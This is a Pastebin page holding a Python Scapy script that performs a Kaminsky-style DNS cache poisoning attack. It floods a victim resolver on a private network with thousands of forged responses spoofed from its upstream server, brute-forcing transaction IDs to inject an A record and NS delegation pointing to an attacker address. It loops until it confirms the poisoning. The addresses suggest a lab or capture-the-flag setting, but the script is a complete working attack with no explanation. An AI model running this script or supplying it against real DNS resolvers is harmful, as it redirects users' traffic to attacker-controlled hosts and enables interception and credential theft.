Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import logging
- logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
- from scapy.all import *
- import scapy.sendrecv
- scapy.sendrecv.wrpcap = wrpcap
- import string
- victim = '10.17.27.3'
- proxy = '10.17.27.1'
- spoof_ip = '10.17.27.2'
- poison_domain = '8bdf8e08a4c23aa89ff21690db4cc29b4c04577a2f18e129'
- dns_port = 53
- query_source = 9999
- no_of_packets = 4000
- time_to_live = 86400
- def poison():
- prefix = ''.join(random.SystemRandom().choice(string.ascii_lowercase + string.digits) for _ in range(8))+'.'
- query = Ether() / \
- IP(dst=victim) / \
- UDP(sport=1337,dport=dns_port) / \
- DNS(id=1337,rd=1,
- qd=DNSQR(qname=prefix+poison_domain)
- )
- answer = Ether() / \
- IP(src=proxy,dst=victim) / \
- UDP(sport=dns_port,dport=query_source) / \
- DNS(id=range(0,no_of_packets),qr=1,rd=0,ra=0,aa=1,
- qd=DNSQR(qname=prefix+poison_domain),
- an=DNSRR(rrname=prefix+poison_domain,type='A',ttl=time_to_live,rdata=spoof_ip),
- ns=DNSRR(rrname=poison_domain,type='NS',ttl=time_to_live,rdata='ns.'+poison_domain),
- ar=DNSRR(rrname='ns.'+poison_domain,type='A',ttl=time_to_live,rdata=spoof_ip)
- )
- poisoned_packets = get_temp_file()
- wrpcap(poisoned_packets,answer)
- print "Poisoning..."
- sendp(query,verbose=0)
- sendfast(poisoned_packets)
- return prefix
- def is_poisoned():
- query = IP(dst=victim) / \
- UDP(sport=1337,dport=dns_port) / \
- DNS(id=1337,rd=0,
- qd=DNSQR(qname=poison_domain)
- )
- response = sr1(query,verbose=0)
- return response[DNS].ancount==1
- def sendfast(x, iface=None):
- iface = conf.iface
- argv = [conf.prog.tcpreplay, "--intf1=%s" % iface ]
- argv.append("--topspeed")
- argv.append(x)
- try:
- devnull = open(os.devnull, 'w')
- subprocess.check_call(argv,stdout=devnull,stderr=devnull)
- devnull.close()
- except KeyboardInterrupt:
- log_interactive.info("Interrupted by user")
- except Exception,e:
- log_interactive.error("while trying to exec [%s]: %s" % (argv[0],e))
- finally:
- os.unlink(x)
- while True:
- subdomain = poison()
- if is_poisoned():
- print "subdomain: " + subdomain
- break
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement